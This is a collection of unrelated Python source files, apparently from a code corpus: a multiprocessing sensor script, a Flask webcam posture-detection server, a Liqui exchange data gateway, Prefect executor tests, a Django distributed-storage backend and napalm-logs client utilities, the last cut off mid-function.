KirimSensorKanan = Process(target=SensorKanan,args=(kananIn,))
KirimLampu = Process(target=SensorTraffic,args=(lampuIn,))
ControllerUtama = Process(target=Controller,args=(depanOut,belakangOut,kiriOut,kananOut,lampuOut))
KirimLampu.start()
KirimSensorDepan.start()
KirimSensorBelakang.start()
KirimSensorKiri.start()
KirimSensorKanan.start()
ControllerUtama.start()
KirimLampu.join()
KirimSensorDepan.join()
KirimSensorBelakang.join()
KirimSensorKiri.join()
KirimSensorKanan.join()
ControllerUtama.join()
time.sleep(1) |
trash.py | # USAGE
# python webstreaming.py --ip 0.0.0.0 --port 8000
# source venv/bin/activate
# import the necessary packages
from pyimagesearch.motion_detection import SingleMotionDetector
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import threading
import argparse
import datetime
import imutils
import time
import cv2
import math
import numpy as np
import util
from config_reader import config_reader
from scipy.ndimage.filters import gaussian_filter
from model import get_testing_model
outputFrame = None
lock = threading.Lock()
# initialize a flask object
app = Flask(__name__)
# vs = VideoStream(src=0).start()
time.sleep(2.0)
tic=0
# visualize
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
[0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
[85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]
#[start]yerin
states = list(range(4)) #good posture, arm, kneel, back
#[end]yerin
@app.route("/")
def index():
load_state()
# return the rendered template
return render_template("index.html", states=states)
#[start]yerin
def load_state():
states[0]="posture"
file = open ("armstate.txt", "r")
states[1] = file.read()
file.close
file = open ("kneelstate.txt", "r")
states[2] = file.read()
file.close
file = open ("backstate.txt", "r")
states[3] = file.read()
file.close
if(states[1]=="Not Folding Hands" and states[2]=="Not kneeling" and states[3]=="Straight"):
states[0]="good posture"
elif(states[1]=="Folding Hands" or states[2]=="kneeling" or states[3]=="Hunchback" or states[3]=="Reclined"):
states[0]="bad posture"
else:
states[0]="Not detected"
return 0
#[end]yerin
def detect_motion():
global outputFrame, lock
cap=cv2.VideoCapture(0)
cap.set(100,160)
cap.set(200,120)
# loop over frames from the video stream
while True:
ret,frame=cap.read()
#test
frame = imutils.resize(frame, width=800)
#
params, model_params = config_reader()
oriImg = frame # B,G,R order
multiplier = [x * model_params['boxsize'] / oriImg.shape[0] for x in params['scale_search']]
heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))
paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))
for m in range(1):
scale = multiplier[0]
imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
imageToTest_padded, pad = util.padRightDownCorner(imageToTest, model_params['stride'],
model_params['padValue'])
input_img = np.transpose(np.float32(imageToTest_padded[:,:,:,np.newaxis]), (3,0,1,2)) # required shape (1, width, height, channels)
output_blobs = model.predict(input_img)
heatmap = np.squeeze(output_blobs[1]) # output 1 is heatmaps
heatmap = cv2.resize(heatmap, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3],
:]
heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
paf = np.squeeze(output_blobs[0]) # output 0 is PAFs
paf = cv2.resize(paf, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
heatmap_avg = heatmap_avg + heatmap / len(multiplier)
paf_avg = paf_avg + paf / len(multiplier)
all_peaks = [] #To store all the key points which a re detected.
peak_counter = 0
# prinfTick(1) #prints time required till now.
for part in range(18):
map_ori = heatmap_avg[:, :, part]
map = gaussian_filter(map_ori, sigma=3)
map_left = np.zeros(map.shape)
map_left[1:, :] = map[:-1, :]
map_right = np.zeros(map.shape)
map_right[:-1, :] = map[1:, :]
map_up = np.zeros(map.shape)
map_up[:, 1:] = map[:, :-1]
map_down = np.zeros(map.shape)
map_down[:, :-1] = map[:, 1:]
peaks_binary = np.logical_and.reduce(
(map >= map_left, map >= map_right, map >= map_up, map >= map_down, map > params['thre1']))
peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse
peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
id = range(peak_counter, peak_counter + len(peaks))
peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]
all_peaks.append(peaks_with_score_and_id)
peak_counter += len(peaks)
connection_all = []
special_k = []
mid_num = 10
# prinfTick(2) #prints time required till now.
canvas = frame# B,G,R order
for i in range(18): #drawing all the detected key points.
for j in range(len(all_peaks[i])):
cv2.circle(canvas, all_peaks[i][j][0:2], 4, colors[i], thickness=-1)
print()
position = checkPosition(all_peaks)
checkKneeling(all_peaks)
checkHandFold(all_peaks)
print()
print()
with lock:
outputFrame = canvas.copy()
cap.release()
def checkPosition(all_peaks):
#[start]yerin
file = open ("backstate.txt", "w")
#[end]yerin
try:
f = 0
if (all_peaks[16]):
a = all_peaks[16][0][0:2] #Right Ear
f = 1
else:
a = all_peaks[17][0][0:2] #Left Ear
b = all_peaks[11][0][0:2] # Hip
angle = calcAngle(a,b)
degrees = round(math.degrees(angle))
if (f):
degrees = 180 - degrees
if (degrees<70):
#[start]yerin
file.write("Hunchback")
#[end]yerin
print("Hunchback")
return 1
elif (degrees > 110):
#[start]yerin
file.write("Reclined")
#[end]yerin
print ("Reclined")
return -1
else:
#[start]yerin
file.write("Straight")
#[end]yerin
print("Straight")
return 0
except Exception as e:
#[start]yerin
file.write("person not in lateral view and unable to detect ears or hip")
#[end]yerin
print("person not in lateral view and unable to detect ears or hip")
#[start]yerin
file.close()
#[end]yerin
def calcAngle(a, b):
try:
ax, ay = a
bx, by = b
if (ax == bx):
return 1.570796
return math.atan2(by-ay, bx-ax)
except Exception as e:
print("unable to calculate angle")
def checkHandFold(all_peaks):
#[start]yerin
file = open ("armstate.txt", "w")
#[end]yerin
try:
if (all_peaks[3][0][0:2]):
try:
if (all_peaks[4][0][0:2]):
distance = calcDistance(all_peaks[3][0][0:2],all_peaks[4][0][0:2]) #distance between right arm-joint and right palm.
armdist = calcDistance(all_peaks[2][0][0:2], all_peaks[3][0][0:2]) #distance between left arm-joint and left palm.
if (distance < (armdist + 100) and distance > (armdist - 100) ): #this value 100 is arbitary. this shall be replaced with a calculation which can adjust to different sizes of people.
print("Not Folding Hands")
#[start]yerin
file.write("Not Folding Hands")
#[end]yerin
else:
print("Folding Hands")
#[start]yerin
file.write("Folding Hands")
#[end]yerin
except Exception as e:
print("Folding Hands")
#[start]yerin
file.write("Folding Hands")
#[end]yerin
except Exception as e:
try:
if(all_peaks[7][0][0:2]):
distance = calcDistance( all_peaks[6][0][0:2] ,all_peaks[7][0][0:2])
armdist = calcDistance(all_peaks[6][0][0:2], all_peaks[5][0][0:2])
if (distance < (armdist + 100) and distance > (armdist - 100)):
print("Not Folding Hands")
#[start]yerin
file.write("Not Folding Hands")
#[end]yerin
else:
print("Folding Hands")
#[start]yerin
file.write("Folding Hands")
#[end]yerin
except Exception as e:
print("Unable to detect arm joints")
#[start]yerin
file.write("Unable to detect arm joints")
#[end]yerin
def calcDistance(a,b): #calculate distance between two points.
try:
x1, y1 = a
x2, y2 = b
return math.hypot(x2 - x1, y2 - y1)
except Exception as e:
print("unable to calculate distance")
def checkKneeling(all_peaks):
#[start]yerin
file = open ("kneelstate.txt", "w")
#[end]yerin
f = 0
if (all_peaks[16]):
f = 1
try:
if(all_peaks[10][0][0:2] and all_peaks[13][0][0:2]):
rightankle = all_peaks[10][0][0:2]
leftankle = all_peaks[13][0][0:2]
hip = all_peaks[11][0][0:2]
leftangle = calcAngle(hip,leftankle)
leftdegrees = round(math.degrees(leftangle))
rightangle = calcAngle(hip,rightankle)
rightdegrees = round(math.degrees(rightangle))
if (f == 0):
leftdegrees = 180 - leftdegrees
rightdegrees = 180 - rightdegrees
if (leftdegrees > 60 and rightdegrees > 60): # 60 degrees is trail and error value here. We can tweak this accordingly and results will vary.
print ("Both Legs are in Kneeling")
#[start]yerin
file.write("kneeling")
#[end]yerin
elif (rightdegrees > 60):
print ("kneeling")
#[start]yerin
file.write("Right leg is kneeling")
#[end]yerin
elif (leftdegrees > 60):
print ("Left leg is kneeling")
#[start]yerin
file.write("kneeling")
#[end]yerin
else:
print ("Not kneeling")
#[start]yerin
file.write("Not kneeling")
#[end]yerin
except IndexError as e:
try:
if (f):
a = all_peaks[10][0][0:2] # if only one leg (right leg) is detected
else:
a = all_peaks[13][0][0:2] # if only one leg (left leg) is detected
b = all_peaks[11][0][0:2] #location of hip
angle = calcAngle(b,a)
degrees = round(math.degrees(angle))
if (f == 0):
degrees = 180 - degrees
if (degrees > 60):
print ("Both Legs Kneeling")
#[start]yerin
file.write("kneeling")
#[end]yerin
else:
print("Not Kneeling")
#[start]yerin
file.write("Not kneeling")
#[end]yerin
except Exception as e:
print("legs not detected")
#[start]yerin
file.write("legs not detected")
#[end]yerin
def generate():
# grab global references to the output frame and lock variables
global outputFrame, lock
# loop over frames from the output stream
while True:
with lock:
if outputFrame is None:
continue
# encode the frame in JPEG format
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
if not flag:
continue
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
# check to see if this is the main thread of execution
if __name__ == '__main__':
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", type=str, required=True,
help="ip address of the device")
ap.add_argument("-o", "--port", type=int, required=True,
help="ephemeral port number of the server (1024 to 65535)")
ap.add_argument("-f", "--frame-count", type=int, default=32,
help="# of frames used to construct the background model")
args = vars(ap.parse_args())
model = get_testing_model()
model.load_weights('./model/keras/model.h5')
# while(1):
# ret,frame=cap.read()
# params, model_params = config_reader()
# canvas = detect_motion(frame, params, model_params)
# cv2.imshow("capture",canvas)
# if cv2.waitKey(1) & 0xFF==ord('q'):
# break
# cap.release()
# start a thread that will perform motion detection
t = threading.Thread(target=detect_motion)
t.daemon = True
t.start()
# start the flask app
app.run(host=args["ip"], port=args["port"], debug=True,
threaded=True, use_reloader=False)
# release the video stream pointer
# vs.stop() |
liqui.py | from restful_api_socket import RESTfulApiSocket
from exchanges.gateway import ExchangeGateway
from market_data import L2Depth, Trade
from util import Logger
from instrument import Instrument
from clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiLiqui(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.liqui.io/api/3/depth/{0}".format(
instmt.get_instmt_code())
@classmethod
def get_trades_link(cls, instmt):
return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
(instmt.get_instmt_code()))
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
raw = raw[instmt.instmt_code]
keys = list(raw.keys())
if (cls.get_bids_field_name() in keys and
cls.get_asks_field_name() in keys):
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
res = res[instmt.instmt_code]
for i in range(0, len(res)):
t = res[len(res) - 1 - i]
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwLiqui(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Liqui'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Thread(target=partial(self.get_order_book_worker, instmt))
t2 = Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Liqui'
instmt_name = 'ETHBTC'
instmt_code = 'eth_btc'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwLiqui([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
test_executors.py | import multiprocessing
import time
from datetime import timedelta
from unittest.mock import MagicMock
import pytest
import prefect
from prefect.utilities.executors import (
Heartbeat,
main_thread_timeout,
multiprocessing_timeout,
)
def test_heartbeat_calls_function_on_interval():
class A:
def __init__(self):
self.called = 0
def __call__(self):
self.called += 1
a = A()
timer = Heartbeat(0.09, a)
timer.start()
time.sleep(0.2)
timer.cancel()
assert a.called == 2
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_times_out(handler):
slow_fn = lambda: time.sleep(2)
with pytest.raises(TimeoutError):
handler(slow_fn, timeout=1)
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_passes_args_and_kwargs_and_returns(handler):
def do_nothing(x, y=None):
return x, y
assert handler(do_nothing, 5, timeout=1, y="yellow") == (5, "yellow")
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_doesnt_swallow_bad_args(handler):
def do_nothing(x, y=None):
return x, y
with pytest.raises(TypeError):
handler(do_nothing, timeout=1)
with pytest.raises(TypeError):
handler(do_nothing, 5, timeout=1, z=10)
with pytest.raises(TypeError):
handler(do_nothing, 5, timeout=1, y="s", z=10)
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_reraises(handler):
def do_something():
raise ValueError("test")
with pytest.raises(ValueError) as exc:
handler(do_something, timeout=1)
assert "test" in exc
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_allows_function_to_spawn_new_process(handler):
def my_process():
p = multiprocessing.Process(target=lambda: 5)
p.start()
p.join()
p.terminate()
assert handler(my_process, timeout=1) is None
def test_main_thread_timeout_doesnt_do_anything_if_no_timeout(monkeypatch):
monkeypatch.delattr(prefect.utilities.executors.signal, "signal")
with pytest.raises(AttributeError): # to test the test's usefulness...
main_thread_timeout(lambda: 4, timeout=1)
assert main_thread_timeout(lambda: 4) == 4
def test_multiprocessing_timeout_doesnt_do_anything_if_no_timeout(monkeypatch):
monkeypatch.delattr(prefect.utilities.executors.multiprocessing, "Process")
with pytest.raises(AttributeError): # to test the test's usefulness...
multiprocessing_timeout(lambda: 4, timeout=1)
assert multiprocessing_timeout(lambda: 4) == 4
|
storage.py | # -*- coding:utf-8 -*-
from threading import Thread
import socket
import random
import urlparse
from django.core.files import base
from django.core.files.storage import Storage, FileSystemStorage
from django.conf import settings
from django_dust import http
from django_dust.settings import getsetting
class DistributionError(IOError):
pass
class DistributedStorage(Storage):
'''
DistributedStorage saves files by copying them on several servers listed
in settings.DUST_HOSTS.
'''
def __init__(self, hosts=None, use_local=None, base_url=getsetting('DUST_STORAGE_URL'), **kwargs):
super(DistributedStorage, self).__init__(**kwargs)
if hosts is None:
hosts = getsetting('DUST_HOSTS')
self.hosts = hosts
if use_local is None:
use_local = getsetting('DUST_USE_LOCAL_FS')
self.local_storage = use_local and FileSystemStorage(base_url=base_url, location=getsetting('DUST_STORAGE_ROOT'), **kwargs)
self.base_url = base_url
self.transport = http.HTTPTransport(base_url=base_url)
def _execute(self, func, name, args):
'''
Runs an operation (put or delete) over several hosts at once in multiple
threads.
'''
def run(index, host):
try:
results[index] = func(host, name, *args)
except Exception, e:
results[index] = (e)
# Run distribution threads keeping result of each operation in `results`.
results = [None] * len(self.hosts)
threads = [Thread(target=run, args=(index, h)) for index, h in enumerate(self.hosts)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
exceptions = []
for host, result in zip(self.hosts, results):
if result is None: # no errors, remember successful_host to use in retries
successful_host = host
break
else:
successful_host = None
# All `socket.error` exceptions are not fatal meaning that a host might
# be temporarily unavailable. Those operations are kept in a queue in
# database to be retried later.
# All other errors mean in most casess misconfigurations and are fatal
# for the whole distributed operation.
for host, result in zip(self.hosts, results):
if isinstance(result, socket.error):
if successful_host is not None:
from django_dust import retry_storage # this causes errors when imported at module level
retry_storage.create(
operation=func.__name__,
target_host=host,
source_host=successful_host,
filename=name,
)
else:
exceptions.append(result)
elif isinstance(result, Exception):
exceptions.append(result)
if exceptions:
raise DistributionError(*exceptions)
def _open(self, name, mode='rb'):
if mode != 'rb':
# In future when allowed to operate locally (self.local_storage)
# all modes can be allowed. However this will require executing
# distribution upon closing file opened for updates. This worth
# evaluating.
raise IOError('Illegal mode "%s". Only "rb" is supported.')
if self.local_storage:
return self.local_storage.open(name, mode)
host = random.choice(self.hosts)
return base.ContentFile(self.transport.get(host, name))
def _save(self, name, content):
content.seek(0)
body = content.read()
self._execute(self.transport.put, name, [body])
return name
def get_available_name(self, name):
"""
Deletes the given file if it exists.
"""
if self.exists(name):
self.delete(name)
return name
"""
def get_available_name(self, name):
from django_dust import retry_storage # this causes errors when imported at module level
while self.exists(name) or retry_storage.filter_by_filename(name):
try:
dot_index = name.rindex('.')
except ValueError: # filename has no dot
name += '_'
else:
name = name[:dot_index] + '_' + name[dot_index:]
return name
"""
def path(self, name):
if self.local_storage:
return self.local_storage.path(name)
return super(DistributedStorage, self).path(name)
def delete(self, name):
self._execute(self.transport.delete, name, [])
def exists(self, name):
if self.local_storage:
return self.local_storage.exists(name)
return self.transport.exists(random.choice(self.hosts), name)
def listdir(self, path):
if self.local_storage:
return self.local_storage.listdir(path)
raise NotImplementedError()
def size(self, name):
if self.local_storage:
return self.local_storage.size(name)
return self.transport.size(random.choice(self.hosts), name)
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
return urlparse.urljoin(self.base_url, name).replace('\\', '/')
|
__init__.py | # -*- coding: utf-8 -*-
'''
napalm-logs utilities
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import pythond stdlib
import re
import ssl
import copy
import time
import socket
import logging
import threading
import collections
from pydoc import locate
from datetime import datetime
# Import python stdlib
import umsgpack
import nacl.secret
import nacl.signing
import nacl.encoding
from nacl.exceptions import CryptoError
from nacl.exceptions import BadSignatureError
# Import napalm-logs pkgs
import napalm_logs.config as defaults
import napalm_logs.ext.six as six
from napalm_logs.exceptions import ClientConnectException
from napalm_logs.exceptions import CryptoException
from napalm_logs.exceptions import BadSignatureException
log = logging.getLogger(__name__)
class ClientAuth:
'''
Client auth class.
'''
def __init__(
self,
certificate,
address=defaults.AUTH_ADDRESS,
port=defaults.AUTH_PORT,
timeout=defaults.AUTH_TIMEOUT,
max_try=defaults.AUTH_MAX_TRY,
):
self.certificate = certificate
self.address = address
self.port = port
self.timeout = timeout
self.max_try = max_try
self.auth_try_id = 0
self.priv_key = None
self.verify_key = None
self.ssl_skt = None
self.__up = True
self.authenticate()
self._start_keep_alive()
def _start_keep_alive(self):
'''
Start the keep alive thread as a daemon
'''
keep_alive_thread = threading.Thread(target=self.keep_alive)
keep_alive_thread.daemon = True
keep_alive_thread.start()
def keep_alive(self):
'''
Send a keep alive request periodically to make sure that the server
is still alive. If not then try to reconnect.
'''
self.ssl_skt.settimeout(defaults.AUTH_KEEP_ALIVE_INTERVAL)
while self.__up:
try:
log.debug('Sending keep-alive message to the server')
self.ssl_skt.send(defaults.AUTH_KEEP_ALIVE)
except socket.error:
log.error('Unable to send keep-alive message to the server.')
log.error('Re-init the SSL socket.')
self.reconnect()
log.debug('Trying to re-send the keep-alive message to the server.')
self.ssl_skt.send(defaults.AUTH_KEEP_ALIVE)
msg = self.ssl_skt.recv(len(defaults.AUTH_KEEP_ALIVE_ACK))
log.debug('Received %s from the keep-alive server', msg)
if msg != defaults.AUTH_KEEP_ALIVE_ACK:
log.error(
'Received %s instead of %s form the auth keep-alive server',
msg,
defaults.AUTH_KEEP_ALIVE_ACK,
)
log.error('Re-init the SSL socket.')
self.reconnect()
time.sleep(defaults.AUTH_KEEP_ALIVE_INTERVAL)
def reconnect(self):
'''
Try to reconnect and re-authenticate with the server.
'''
log.debug('Closing the SSH socket.')
try:
self.ssl_skt.close()
except socket.error:
log.error('The socket seems to be closed already.')
log.debug('Re-opening the SSL socket.')
self.authenticate()
def authenticate(self):
'''
Authenticate the client and return the private
and signature keys.
Establish a connection through a secured socket,
then do the handshake using the napalm-logs
auth algorithm.
'''
log.debug(
'Authenticate to %s:%d, using the certificate %s',
self.address,
self.port,
self.certificate,
)
if ':' in self.address:
skt_ver = socket.AF_INET6
else:
skt_ver = socket.AF_INET
skt = socket.socket(skt_ver, socket.SOCK_STREAM)
self.ssl_skt = ssl.wrap_socket(
skt, ca_certs=self.certificate, cert_reqs=ssl.CERT_REQUIRED
)
try:
self.ssl_skt.connect((self.address, self.port))
self.auth_try_id = 0
except socket.error as err:
log.error('Unable to open the SSL socket.')
self.auth_try_id += 1
if not self.max_try or self.auth_try_id < self.max_try:
log.error('Trying to authenticate again in %d seconds', self.timeout)
time.sleep(self.timeout)
self.authenticate()
log.critical(
'Giving up, unable to authenticate to %s:%d using the certificate %s',
self.address,
self.port,
self.certificate,
)
raise ClientConnectException(err)
# Explicit INIT
self.ssl_skt.write(defaults.MAGIC_REQ)
# Receive the private key
private_key = self.ssl_skt.recv(defaults.BUFFER_SIZE)
# Send back explicit ACK
self.ssl_skt.write(defaults.MAGIC_ACK)
# Read the hex of the verification key
verify_key_hex = self.ssl_skt.recv(defaults.BUFFER_SIZE)
# Send back explicit ACK
self.ssl_skt.write(defaults.MAGIC_ACK)
self.priv_key = nacl.secret.SecretBox(private_key)
self.verify_key = nacl.signing.VerifyKey(
verify_key_hex, encoder=nacl.encoding.HexEncoder
)
def decrypt(self, binary):
'''
Decrypt and unpack the original OpenConfig object,
serialized using MessagePack.
Raise BadSignatureException when the signature
was forged or corrupted.
'''
try:
encrypted = self.verify_key.verify(binary)
except BadSignatureError:
log.error('Signature was forged or corrupt', exc_info=True)
raise BadSignatureException('Signature was forged or corrupt')
try:
packed = self.priv_key.decrypt(encrypted)
except CryptoError:
log.error('Unable to decrypt', exc_info=True)
raise CryptoException('Unable to decrypt')
return umsgpack.unpackb(packed)
def stop(self):
'''
Stop the client.
'''
self.__up = False
self.ssl_skt.close()
def cast(var, function):
# If the function is a build in function
if locate(function) and hasattr(locate(function), '__call__'):
try:
return locate(function)(var)
except ValueError:
log.error(
'Unable to use function %s on value %s', function, var, exc_info=True
)
# If the function is str function
if hasattr(str, function) and hasattr(getattr(str, function), '__call__'):
return getattr(str, function)(var)
glob = globals()
# If the function is defined in this module
if function in glob and hasattr(glob[function], '__call__'):
return glob[function](var)
# If none of the above, just return the original var
return var
def color_to_severity(var):
colour_dict = {'RED': 3, 'YELLOW': 4}
return colour_dict.get(var, var)
def bgp_state_convert(state):
"""
Given a matched BGP state, map it to a vendor agnostic version.
"""
state_dict = {
'OpenSent': 'OPEN_SENT',
'OpenConfirm': 'OPEN_CONFIRM',
'Up': 'ESTABLISHED',
'Down': 'ACTIVE',
}
return state_dict.get(state, state.upper())
def bfd_state_convert(state):
"""
Given a matched BFD state, map it to a vendor agnostic version.
"""
state_dict = {'AdminDown': 'ADMIN_DOWN'}
return state_dict.get(state, state.upper())
def unserialize(binary):
'''
Unpack the original OpenConfig object,
serialized using MessagePack.
This is to be used when disable_security is set.
'''
return umsgpack.unpackb(binary)
def extract(rgx, msg, mapping, time_format=None):
ret = {}
log.debug('Matching regex "%s" on "%s"', rgx, msg)
matched = re.search(rgx, msg, re.I)
if not matched:
log.info('The regex didnt match')
return None
else:
group_index = 0
for group_value in matched.groups():
group_name = list(mapping.keys())[group_index]
ret[group_name] = group_value
group_index += 1
log.debug('Regex matched')
log.debug(ret)
if time_format:
try:
parsed_time = datetime.strptime(
time_format[0].format(**ret), time_format[1]
)
except ValueError as error:
log.error('Unable to convert date and time into a timestamp: %s', error)
ret['timestamp'] = int((parsed_time - datetime(1970, 1, 1)).total_seconds())
return ret
def setval(key, val, dict_=None, delim=defaults.DEFAULT_DELIM):
'''
Set a value under the dictionary hierarchy identified
under the key. The target 'foo/bar/baz' returns the
dictionary hierarchy {'foo': {'bar': {'baz': {}}}}.
.. note::
Currently this doesn't work with integers, i.e.
cannot build lists dynamically.
TODO
'''
if not dict_:
dict_ = {}
prev_hier = dict_
dict_hier = key.split(delim)
for each in dict_hier[:-1]:
if isinstance(each, six.string_type):
if each not in prev_hier:
prev_hier[each] = {}
prev_hier = prev_hier[each]
else:
prev_hier[each] = [{}]
prev_hier = prev_hier[each]
prev_hier[dict_hier[-1]] = val
return dict_
def traverse(data, key, delim=defaults.DEFAULT_DELIM):
'''
Traverse a dict or list using a slash delimiter target string.
The target 'foo/bar/0' will return data['foo']['bar'][0] if
this value exists, otherwise will return empty dict.
Return None when not found.
This can be used to verify if a certain key exists under
dictionary hierarchy.
'''
for each in key.split(delim):
if isinstance(data, list):
